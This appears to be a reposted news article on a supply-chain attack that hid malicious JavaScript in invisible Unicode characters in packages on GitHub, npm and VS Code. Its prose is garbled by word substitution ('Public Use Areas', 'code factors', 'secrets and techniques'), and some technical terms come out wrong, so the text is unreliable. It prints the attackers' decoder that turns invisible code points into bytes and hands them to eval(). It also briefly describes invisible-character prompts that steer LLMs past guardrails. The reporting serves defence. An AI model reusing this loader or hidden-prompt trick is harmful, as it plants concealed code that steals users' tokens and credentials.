Close Menu
    Facebook LinkedIn YouTube WhatsApp X (Twitter) Pinterest
    Trending
    • New tiny nudibranch species discovered in Taiwan
    • Why the Budget’s CGT changes are a disaster for angel investors and startups
    • OpenAI and Anthropic Sign Letter to Prevent AI-Developed Biological Weapons
    • New York sports betting statements bill advances
    • SwitchBot Launches the Most Complete Home Weather Station I’ve Seen
    • What It Takes for Future-Ready Power Distribution
    • Are we safe from this deadly virus?
    • Edinburgh-based Wordsmith raises €60.2 million Series B to scale legal AI platform for in-house teams
    Facebook LinkedIn WhatsApp
    Times FeaturedTimes Featured
    Thursday, June 4
    • Home
    • Founders
    • Startups
    • Technology
    • Profiles
    • Entrepreneurs
    • Leaders
    • Students
    • VC Funds
    • More
      • AI
      • Robotics
      • Industries
      • Global
    Times FeaturedTimes Featured
    Home»News»Supply-chain attack using invisible code hits GitHub and other repositories
    News

    Supply-chain attack using invisible code hits GitHub and other repositories

    Editor Times FeaturedBy Editor Times FeaturedMarch 14, 2026No Comments3 Mins Read
    Facebook Twitter Pinterest Telegram LinkedIn Tumblr WhatsApp Email
    Share
    Facebook Twitter LinkedIn Pinterest Telegram Email WhatsApp Copy Link

    The invisible code is rendered with Public Use Areas (typically referred to as Public Use Entry), that are ranges within the Unicode specification for particular characters reserved for personal use in defining emojis, flags, and different symbols. The code factors characterize each letter of the US alphabet when fed to computer systems, however their output is totally invisible to people. Individuals reviewing code or utilizing static analysis instruments see solely whitespace or clean traces. To a JavaScript interpreter, the code factors translate into executable code.

    The invisible Unicode characters had been devised a long time in the past after which largely forgotten. That’s, till 2024, when hackers started utilizing the characters to hide malicious prompts fed to AI engines. Whereas the textual content was invisible to people and textual content scanners, LLMs had little hassle studying them and following the malicious directions they conveyed. AI engines have since devised guardrails which might be designed to limit utilization of the characters, however such defenses are periodically overridden.

    Since then, the Unicode approach has been utilized in extra conventional malware assaults. In one of many packages Aikido analyzed in Friday’s submit, the attackers encoded a malicious payload utilizing the invisible characters. Inspection of the code exhibits nothing. Throughout the JavaScript runtime, nonetheless, a small decoder extracts the true bytes and passes them to the eval() perform.

    const s = v => [...v].map(w => (
      w = w.codePointAt(0),
      w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
      w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
    )).filter(n => n !== null);
    
    
    eval(Buffer.from(s(``)).toString('utf-8'));

    “The backtick string handed to s() appears empty in each viewer, but it surely’s filled with invisible characters that, as soon as decoded, produce a full malicious payload,” Aikido defined. “In previous incidents, that decoded payload fetched and executed a second-stage script utilizing Solana as a supply channel, able to stealing tokens, credentials, and secrets and techniques.”

    Since discovering the brand new spherical of packages on GitHub, the researchers have discovered comparable ones on npm and the VS Code market. Aikido stated the 151 packages detected are possible a small fraction unfold throughout the marketing campaign as a result of many have been deleted since first being uploaded.

    The easiest way to guard towards the scourge of supply-chain assaults is to rigorously examine packages and their dependencies earlier than incorporating them into initiatives. This contains scrutinizing bundle names and trying to find typos. If suspicions about LLM use are right, malicious packages could more and more look like authentic, significantly when invisible unicode characters are encoding malicious payloads.



    Source link

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Editor Times Featured
    • Website

    Related Posts

    New York sports betting statements bill advances

    June 4, 2026

    Why geolocation is challenging for prediction markets

    June 3, 2026

    Indian IT companies have spent $7.1B on acquisitions since the start of 2025 to gain clients, as AI-led pricing pressure weakens organic growth (Shristi Achar/The Economic Times)

    June 3, 2026

    People Incorporated launches $18B bid for MGM Resorts

    June 3, 2026

    Illinois prediction markets face new transaction tax

    June 3, 2026

    Galveston gambling investigation expands with coordinated raids

    June 2, 2026

    Comments are closed.

    Editors Picks

    New tiny nudibranch species discovered in Taiwan

    June 4, 2026

    Why the Budget’s CGT changes are a disaster for angel investors and startups

    June 4, 2026

    OpenAI and Anthropic Sign Letter to Prevent AI-Developed Biological Weapons

    June 4, 2026

    New York sports betting statements bill advances

    June 4, 2026
    Categories
    • Founders
    • Startups
    • Technology
    • Profiles
    • Entrepreneurs
    • Leaders
    • Students
    • VC Funds
    About Us
    About Us

    Welcome to Times Featured, an AI-driven entrepreneurship growth engine that is transforming the future of work, bridging the digital divide and encouraging younger community inclusion in the 4th Industrial Revolution, and nurturing new market leaders.

    Empowering the growth of profiles, leaders, entrepreneurs businesses, and startups on international landscape.

    Asia-Middle East-Europe-North America-Australia-Africa

    Facebook LinkedIn WhatsApp
    Featured Picks

    Paris-based Equitable Earth secures €12.6 million to become the global standard for nature-based carbon projects

    January 10, 2026

    Enhancing Customer Support with AI Text-to-Speech Tools

    June 19, 2025

    Today’s NYT Mini Crossword Answers for Nov. 15

    November 15, 2025
    Categories
    • Founders
    • Startups
    • Technology
    • Profiles
    • Entrepreneurs
    • Leaders
    • Students
    • VC Funds
    Copyright © 2024 Timesfeatured.com IP Limited. All Rights.
    • Privacy Policy
    • Disclaimer
    • Terms and Conditions
    • About us
    • Contact us

    Type above and press Enter to search. Press Esc to cancel.